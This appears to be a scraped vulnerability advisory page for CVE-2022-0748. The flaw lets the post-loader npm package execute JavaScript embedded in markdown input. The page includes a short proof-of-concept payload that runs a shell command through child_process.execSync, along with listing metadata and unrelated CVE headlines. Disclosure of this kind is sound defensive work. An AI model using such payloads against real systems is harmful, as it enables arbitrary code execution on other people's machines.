Headline

CVE-2022-0748: Arbitrary Code Execution in post-loader | CVE-2022-0748 | Snyk

The package post-loader from 0.0.0 are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed.

3 years ago

CVE

Open in Source

#vulnerability #js #java

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about common security vulnerabilities in an interactive lesson.

Start learning

snyk-id

SNYK-JS-POSTLOADER-2403737
published

2 Mar 2022
disclosed

16 Feb 2022
credit

Feng Xiao and Zhongfu Su

How to fix?

There is no fixed version for post-loader.

Overview

Affected versions of this package are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed.

PoC

const postLoader = require('post-loader')
var payload = '---js\n((require("child_process")).execSync("touch rce"))';
new postLoader(payload);

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

2 years ago

2 years ago

2 years ago

2 years ago

2 years ago